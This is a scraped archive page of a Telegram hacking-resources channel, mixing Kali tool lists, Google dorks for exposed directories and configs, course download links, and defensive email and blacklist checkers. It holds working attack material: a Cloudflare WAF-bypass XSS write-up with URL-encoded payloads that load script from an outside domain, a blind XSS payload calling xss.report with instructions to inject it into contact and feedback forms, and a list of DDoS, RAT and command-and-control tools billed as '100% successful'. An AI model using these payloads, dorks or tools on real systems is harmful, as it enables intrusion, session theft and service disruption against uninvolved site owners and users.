متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
Termux All Command [Telegram Group]
الذهاب إلى القناة على Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
إظهار المزيد1 189
المشتركون
لا توجد بيانات24 ساعات
+117 أيام
+4530 أيام
أرشيف المشاركات
📢 Here is the latest release of Kali Linux 2023.4, featuring 15 new tools and the GNOME 45 desktop environment.
1. cabby - TAXII client implementation
2. cti-taxii-client - TAXII 2 client library
3. enum4linux-ng - Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool)
4. exiflooter - Finds geolocation on all image URLs and directories
5. h8mail - Email OSINT & Password breach hunting tool
6. Havoc - Modern and malleable post-exploitation command and control framework
7. OpenTAXII - TAXII server implementation
8. PassDetective - Scans shell command history to detect mistakenly written passwords, API keys, and secrets
9. Portspoof - All 65535 TCP ports are always open & emulates services
10.Raven - Lightweight HTTP file upload service
11. ReconSpider - Most Advanced Open Source Intelligence (OSINT) Framework
12. rling - RLI Next Gen (Rling), a faster multi-threaded, feature rich alternative to rli
13. Sigma-Cli - List and convert Sigma rules into query languages
14. sn0int - Semi-automatic OSINT framework and package manager
15. SPIRE - SPIFFE Runtime Environment is a toolchain of APIs for establishing trust between software systems
In addition to the new tools, Kali says they upgraded the Kernel version to 6.3.7. Time to explore new toys
Some Important Google Dorks::
cache:example.com site:example.com
filetype:pdf filetype:pdf & (before:2022-01-01 after:2023-01-01)
related:www.google.com intext:"Google Dork Query"
inanchor:"cyber attacks" example1 | example2 - dork
example1 | example2 intitle:"Index of /"
intitle:"Apache2 Debian Default Page" intitle:"Index of /" or intitle:"Browse Directory"
intitle:"config.json" intitle:"index of" inurl:.git
intitle:"remote desktop inurl:rdweb" intitle:"Index of /ftp"
#dorks
🔥BUG BOUNTY COURSE 2023 🔥
Topic
1 Introduction To Bug Bounty
2 Our Virtual Lab Setup
3 Website Enumeration & Information Gathering
4 Introduction To Burpsuite
5 HTML Injection
6 Command Injection_Execution
7 Broken Authentication
8 Bruteforce Attacks
9 Sensitive Data Exposure
10 Broken Access Control
11 Security Misconfiguration
12 Cross Site Scripting - XSS
13 SQL Injection
14 XML, XPath Injection, XXE
15 Components With Known Vulnerabilities
16 Insufficient Logging And Monitoring
17 Monetizing Bug Hunting
18 Bonus - Web Developer Fundamentals
19 Bonus - Linux Terminal
20 Bonus - Networking
21 Where To Go From Here
https://mega.nz/folder/96AhRazA#Qci5-I29JIQobl4btJ7w0g
Share and Support❤️ 👍
A Complete CEH-V11 FREE Training!
Build Your Career with the most in Demand Ethical Hacking Certification.
The Certified Ethical Hacker V11- CEH-v11 certification, issued by the EC-Council, serves to certify cybersecurity professionals in the practice of ethical hacking.
Download Link:https://lnkd.in/dwz3ZiEF
XSS bypass Cloudflare WAF 🧱
In a recent task, I tackled an XSS vulnerability in a "q" (Query) parameter of a private application safeguarded by Cloudflare's WAF, a notable obstacle for bypassing. Here's how my payload attempts evolved:
Initial Payload (Blocked):
Encoded as %3Cdiv%20id%3D%22x%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20s%20%3D%20document.createElement%28%27script%27%29%3B%20s.src%20%3D%20%27%2F%2Fxss.today%27%3B%20document.getElementById%28%27x%27%29.appendChild%28s%29%3B%3C%2Fscript%3E, this payload attempted to create a script element to retrieve a resource from 'xss.today' (my own domain for xss PoC's). Cloudflare's WAF successfully blocked this attempt.
Second Attempt (Also Blocked):
Adopting the same encoded method %3Cdiv%20id%3D%22x%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20s%20%3D%20document.createElement%28%27script%27%29%3B%20s.src%20%3D%20%27%2F%2Fxss.today%27%3B%20document.getElementById%28%27x%27%29.appendChild%28s%29%3B%3C%2Fscript%3E, there was no change in strategy, resulting in Cloudflare blocking it again.
Successful Bypass:
The final payload %3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E successfully circumvented the WAF. This payload ingeniously used an iframe to covertly load content from 'xss.today', bypassing the detection mechanisms.
Scribd Downloader
https://scribd.vdownloaders.com
SlideShare Downloader
https://www.slidesharedownload.net
Bug: Blind Sqli
Payload:
';"/></textarea></script><script/src=//xss.report/c/username></script>
Inject your payload in these forms.
Submit Feedback
Contacts us
Join Our Waitlist
Customer Support
check if email field type="text" <input type="text" name="email"> then inject payload in Email field
🔰Learn Linux with these 6 websites
1. Sysxplore
sysxplore.com
2. LinuxOpsys
linuxopsys.com
3. Linux Handbook
linuxhandbook.com
4. Linuxize
Linuxize.com
5. Linux Journey
linuxjourney.com
6. Linux Survival
Linuxsurvival.com
🔰 OSINT Tools for Analyzing Suspicious Emails
https://www.thunderbird.net/en-US/
https://www.browserling.com/
https://mxtoolbox.com/
https://phishtank.org/
https://www.phishtool.com/
https://centralops.net/co/
https://www.virustotal.com/gui/
https://www.talosintelligence.com/
https://www.abuseipdb.com/
https://urlscan.io/
https://any.run/
https://www.hybrid-analysis.com/
Course Name : Web Application Hacking and Penetration Testing
Download Link: https://terabox.fun/sl/53uGHbxJhN
● SEO Spam Scanner: https://lnkd.in/gv4x2wGF
● Google Safe Browsing https://lnkd.in/gKMSs-Ts
● IP BLACKLIST Check : https://lnkd.in/gsC3H3jT
● McAfee BLACKLIST Check: https://lnkd.in/gZxWtXDc
● Sucuri Malware Check: https://lnkd.in/g-DxwPvR
● Spamhaus IP BLACKLIST Check: https://lnkd.in/g_FGQzS7
● Multirbl BLACKLIST Check: https://lnkd.in/gRpdG-uk
● WhatismyipAddress BLACKLIST Check: https://lnkd.in/ggjRkErs
Course Name : Complete WiFi Hacking Course: Beginner to Advanced
Download Link: https://terabox.fun/sl/53uCPkuOus
Course Name : Ultimate Ethical Hacking from Zero To Hero
Download Link: https://terabox.fun/sl/53u8ReGEgD
Course Name : Ethical Hacking from Scratch: Complete Bootcamp 2023
Download Link: https://terabox.fun/sl/53u3lNqwMf
Course Name : Full Web Ethical Hacking Course
Download Link: https://terabox.fun/sl/53tzCwPK32
20 Tools DDOS Attack Works Great 100% Successful 🎉
https://github.com/secgang/ddos-http?search=1
https://github.com/secgang/ddosutils
https://github.com/HyukIsBack/KARMA-DDoS
https://github.com/hoaan1995/ZxCDDoS
https://github.com/screetsec/TheFatRat
https://github.com/grafov/hulk/blob/master/hulk.py
https://github.com/jseidl/GoldenEye
https://github.com/palahsu/DDoS-Ripper
https://github.com/Tmpertor/Raven-Storm
https://github.com/Thibault-69/RAT-Hodin-v2.9
https://github.com/the0cp/awesome-ddos-tools
https://github.com/Xart3mis/AKILT
https://github.com/Leeon123/Aoyama
https://github.com/us-nexus-hackers/US-DDOS-V2
https://github.com/Hex1629/SOCKETPIE_DOSTOOL
https://github.com/pavel-odintsov/fastnetmon
https://github.com/epsylon/ufonet
https://github.com/SuperIlu/DOjS
https://github.com/BC-SECURITY/Empire
https://github.com/Ne0nd0g/merlin
🎁 Share With Credit
